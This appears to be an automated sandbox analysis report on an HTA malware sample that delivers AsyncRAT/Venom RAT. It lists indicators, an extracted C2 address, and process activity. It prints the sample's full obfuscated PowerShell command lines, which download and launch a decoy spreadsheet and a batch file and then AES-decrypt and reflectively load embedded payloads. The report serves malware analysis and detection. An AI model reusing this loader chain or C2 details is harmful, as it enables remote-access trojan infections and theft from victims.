Analysis
-
max time kernel
101s -
max time network
113s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
17-04-2024 01:11
Static task
static1
Behavioral task
behavioral1
Sample
2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta
Resource
win7-20240221-en
General
-
Target
2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta
-
Size
12KB
-
MD5
1813054fd92c59be0214e8f908d31155
-
SHA1
3666af3fcd4dbf6d4881afb6e80841c87732569b
-
SHA256
2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23
-
SHA512
5416b8eebba6bdc80b48fb5c56e78ffa4c260e13513528022ac5f0e2f0ee5831ce3e8e55b5dbe0aadd60e782b7c69891ffd92190863aa4e218c8a5c5fa966869
-
SSDEEP
192:whpDrcs3f1bF0VXd5uQ45pj3PxFtjQp2QYw:wgefH0lC5pTRo
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
194.48.251.169:4449
wmdekgrrot
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/4636-111-0x0000000007920000-0x0000000007938000-memory.dmp family_asyncrat -
Detects executables attemping to enumerate video devices using WMI 1 IoCs
resource yara_rule behavioral2/memory/4636-111-0x0000000007920000-0x0000000007938000-memory.dmp INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice -
Blocklisted process makes network request 3 IoCs
flow pid Process 21 4724 powershell.exe 24 4724 powershell.exe 35 4636 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1976 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4724 powershell.exe 4724 powershell.exe 4636 powershell.exe 4636 powershell.exe 4400 powershell.exe 4400 powershell.exe 4636 powershell.exe 4636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4724 powershell.exe Token: SeDebugPrivilege 4636 powershell.exe Token: SeDebugPrivilege 4400 powershell.exe Token: SeRestorePrivilege 4636 powershell.exe Token: SeBackupPrivilege 4636 powershell.exe Token: SeBackupPrivilege 4636 powershell.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 1976 EXCEL.EXE 4636 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4472 wrote to memory of 4724 4472 mshta.exe 85 PID 4472 wrote to memory of 4724 4472 mshta.exe 85 PID 4472 wrote to memory of 4724 4472 mshta.exe 85 PID 4724 wrote to memory of 1976 4724 powershell.exe 92 PID 4724 wrote to memory of 1976 4724 powershell.exe 92 PID 4724 wrote to memory of 1976 4724 powershell.exe 92 PID 4724 wrote to memory of 1520 4724 powershell.exe 97 PID 4724 wrote to memory of 1520 4724 powershell.exe 97 PID 4724 wrote to memory of 1520 4724 powershell.exe 97 PID 1520 wrote to memory of 1088 1520 cmd.exe 99 PID 1520 wrote to memory of 1088 1520 cmd.exe 99 PID 1520 wrote to memory of 1088 1520 cmd.exe 99 PID 1088 wrote to memory of 4160 1088 cmd.exe 101 PID 1088 wrote to memory of 4160 1088 cmd.exe 101 PID 1088 wrote to memory of 4160 1088 cmd.exe 101 PID 1088 wrote to memory of 4636 1088 cmd.exe 102 PID 1088 wrote to memory of 4636 1088 cmd.exe 102 PID 1088 wrote to memory of 4636 1088 cmd.exe 102 PID 4636 wrote to memory of 4400 4636 powershell.exe 103 PID 4636 wrote to memory of 4400 4636 powershell.exe 103 PID 4636 wrote to memory of 4400 4636 powershell.exe 103 PID 4636 wrote to memory of 4132 4636 powershell.exe 104 PID 4636 wrote to memory of 4132 4636 powershell.exe 104 PID 4636 wrote to memory of 4132 4636 powershell.exe 104
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kECMOkR($gdxSDC, $rTnOMRhfVJUY){[IO.File]::WriteAllBytes($gdxSDC, $rTnOMRhfVJUY)};function mumNyknYLgnsVYB($gdxSDC){if($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74750,74758,74758))) -eq $True){rundll32.exe $gdxSDC }elseif($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74762,74765,74699))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gdxSDC}elseif($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74759,74765,74755))) -eq $True){misexec /qn /i $gdxSDC}else{Start-Process $gdxSDC}};function sSOuincqeTeMefqK($fusnPVMKKSsamabF){$pXfsSsKiwLgzgmXA = New-Object (LSLyBfLILlsvQ @(74728,74751,74766,74696,74737,74751,74748,74717,74758,74755,74751,74760,74766));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$rTnOMRhfVJUY = $pXfsSsKiwLgzgmXA.DownloadData($fusnPVMKKSsamabF);return $rTnOMRhfVJUY};function LSLyBfLILlsvQ($UyfqAHAWGDk){$PuBEDrZXHzyrm=74650;$kKrEoNdYusFnuk=$Null;foreach($FhWJmOIuouGdHGPQ in $UyfqAHAWGDk){$kKrEoNdYusFnuk+=[char]($FhWJmOIuouGdHGPQ-$PuBEDrZXHzyrm)};return $kKrEoNdYusFnuk};function BWGtGqQvhtaMVCwQIH(){$UpkpLddqWxxLFW = $env:AppData + '\';$NYgAUxsoiyj = $UpkpLddqWxxLFW + 'gogi.xlsx';If(Test-Path -Path $NYgAUxsoiyj){Invoke-Item $NYgAUxsoiyj;}Else{ $YEmOvxcFFlsialH = sSOuincqeTeMefqK (LSLyBfLILlsvQ @(74754,74766,74766,74762,74708,74697,74697,74699,74707,74702,74696,74702,74706,74696,74700,74703,74699,74696,74699,74704,74707,74708,74705,74700,74706,74705,74697,74753,74761,74753,74755,74696,74770,74758,74765,74770));kECMOkR $NYgAUxsoiyj $YEmOvxcFFlsialH;Invoke-Item $NYgAUxsoiyj;};$YJtKgLZ = $UpkpLddqWxxLFW + 'gogis.bat'; if (Test-Path -Path $YJtKgLZ){mumNyknYLgnsVYB $YJtKgLZ;}Else{ $WTNqxG = sSOuincqeTeMefqK (LSLyBfLILlsvQ @(74754,74766,74766,74762,74708,74697,74697,74699,74707,74702,74696,74702,74706,74696,74700,74703,74699,74696,74699,74704,74707,74708,74705,74700,74706,74705,74697,74753,74761,74753,74755,74765,74696,74748,74747,74766));kECMOkR $YJtKgLZ $WTNqxG;mumNyknYLgnsVYB $YJtKgLZ;};;;;}BWGtGqQvhtaMVCwQIH;2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\gogi.xlsx"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "5⤵PID:4160
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4636" "2656" "2248" "2660" "0" "0" "2664" "0" "0" "0" "0" "0"6⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4132
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50774a05ce5ee4c1af7097353c9296c62
SHA1658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994
-
Filesize
21KB
MD5dc9e5f0403f2e2c0d8477d0729cde65f
SHA11b77d912997911b6168e6c735b2c2ec8306708f2
SHA25677a84a17e6b8cf1d13c4c94d4b9b1dad2503f073ac556e7675a5816257731747
SHA512e7d1bc29623b78e775e86d372893951c4f66bd9bb34dba3ec0af598deb4e8d7b299de7f8b1c69a481f29ad767c0709cdf5f249224661e7844263c05673d3ce97
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
217B
MD5180d791d34efdb265afd0ff4336e9c59
SHA188c9c4b4c1376229fbc516f8552ddda0ee83c1c4
SHA256263f24d019a6c20e80f88b7e7b8d9037a3b41f6923eab101c131e82c7a2f47e3
SHA512fc61aca2d2c56807561ec02480830058c03c8c84ca7301d702b769a9f1061ab21fe321b45868053e945e8e9aa9d264a22d96c0b2b1a1bc22e55baa57dfaf9178
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize24B
MD54fcb2a3ee025e4a10d21e1b154873fe2
SHA157658e2fa594b7d0b99d02e041d0f3418e58856b
SHA25690bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA5124e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize852B
MD5d5b5932f04b7997635ea30345c9c4b4e
SHA1be7b7999d349b5802a38f8595098a55fec5425a2
SHA2564f8c5fedf89615f1ed179995df54de5193466b576f77e75eb7ebf2c2edec9c45
SHA512f1af57a991080abe07a0917e43f4a6dc6d954eaef92e7d678b9e5cf2e5b4f55dd2ed6caa2ce28bb846a556ff8b428ad9f7353fac710fb648b848cdbd048f05ca
-
Filesize
9KB
MD5600c497f3fe2e8ce045dc56ee1edca75
SHA102fc342d23e3e49c9811592922beb1e4f7d3cfc1
SHA2561235db2b5033bed11ce0586dabd7122f4bab90eb2a4b65a81bba8b884d9c11ed
SHA512ef4a7ad833ea2d7ea0a9b618aee52849e53044d72b737c79e07563ea23d4e181ab5285cc6c7b10e9e18d019d0ea607810d2306e497f394c6ccc1814b3e305809
-
Filesize
6.9MB
MD5a65e873839228c5b453d6effa5d14d16
SHA140be429e0e6b41061f3291d10e720eaebf32eda1
SHA25659c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951
SHA51284ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850